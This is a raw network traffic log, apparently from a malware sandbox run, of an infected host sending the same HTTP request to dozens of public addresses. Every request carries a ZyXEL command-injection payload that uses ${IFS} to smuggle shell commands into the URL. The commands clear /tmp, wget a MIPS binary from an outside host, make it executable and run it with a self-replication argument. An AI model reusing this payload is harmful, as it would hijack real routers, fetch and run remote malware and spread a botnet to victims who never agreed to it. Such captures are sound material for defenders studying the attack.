                                              Jan 29, 2024 07:03:52.050467014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4871192.168.2.144452072.209.201.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050513983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4872192.168.2.1458420197.42.183.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050544977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4873192.168.2.1435148107.43.98.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050600052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4874192.168.2.1459282115.132.34.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050631046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4875192.168.2.1437160138.85.7.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050663948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4876192.168.2.1449572144.160.167.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050697088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4877192.168.2.144138887.236.162.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050757885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4878192.168.2.1454438102.21.165.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050786018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4879192.168.2.143824020.174.186.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050815105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4880192.168.2.145952660.139.251.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050853014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4881192.168.2.144534477.213.151.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050889969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4882192.168.2.146077225.89.206.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050921917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4883192.168.2.1452224219.38.161.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050982952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4884192.168.2.143851441.64.163.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051007986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4885192.168.2.144219095.25.69.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051043987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4886192.168.2.1443718146.211.180.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051086903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4887192.168.2.1447274145.250.225.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051111937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4888192.168.2.1450696181.18.197.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051147938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4889192.168.2.1445658130.202.42.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051182985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4890192.168.2.1451070185.200.181.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051233053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4891192.168.2.145219831.116.239.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051244974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4892192.168.2.144381227.251.23.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051290989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4893192.168.2.1454376199.210.153.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051310062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4894192.168.2.1445818178.7.223.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051361084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4895192.168.2.1454110167.175.18.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051383972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4896192.168.2.1454262115.67.219.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051423073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4897192.168.2.145395262.196.109.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051462889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4898192.168.2.14443985.54.32.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051528931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4899192.168.2.145797287.135.220.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051539898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4900192.168.2.145881448.139.158.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051572084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4901192.168.2.1456856129.124.48.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051609039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4902192.168.2.1444236186.54.37.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051652908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4903192.168.2.144953035.42.86.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051695108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4904192.168.2.1439094129.124.57.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051736116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4905192.168.2.1448964178.41.1.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051764965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4906192.168.2.143806260.184.54.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051795006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4907192.168.2.14409428.203.244.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051820993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4908192.168.2.145191693.252.12.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051851034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4909192.168.2.1435724195.73.38.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051913023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4910192.168.2.1445398150.1.95.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051933050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4911192.168.2.1460296170.61.51.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.051994085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4912192.168.2.144993624.101.9.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052027941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4913192.168.2.145348048.26.16.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052052975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4914192.168.2.145889661.117.234.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052083015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4915192.168.2.1446476154.151.76.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052131891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4916192.168.2.144831480.175.255.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052190065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4917192.168.2.1441444141.90.239.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052222013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4918192.168.2.143322854.125.194.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052248955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4919192.168.2.1460338195.30.50.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052289963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4920192.168.2.1436190139.246.146.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052310944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4921192.168.2.144519294.230.172.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052346945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4922192.168.2.1448592177.218.81.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052382946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4923192.168.2.1442222204.52.56.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052434921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4924192.168.2.1442362152.155.54.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052452087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4925192.168.2.1453554152.253.158.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052495003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4926192.168.2.1453428195.91.232.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052520990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4927192.168.2.1449556113.143.41.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052546024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4928192.168.2.1441992192.4.230.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052587986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4929192.168.2.1436482128.139.38.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052618980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4930192.168.2.143307843.137.221.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052659035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4931192.168.2.1450072140.117.243.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052691936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4932192.168.2.1460174173.164.44.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052752018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4933192.168.2.1446932191.188.180.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052783966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4934192.168.2.1435856185.197.120.219443
                                              TimestampBytes transferredDirectionData
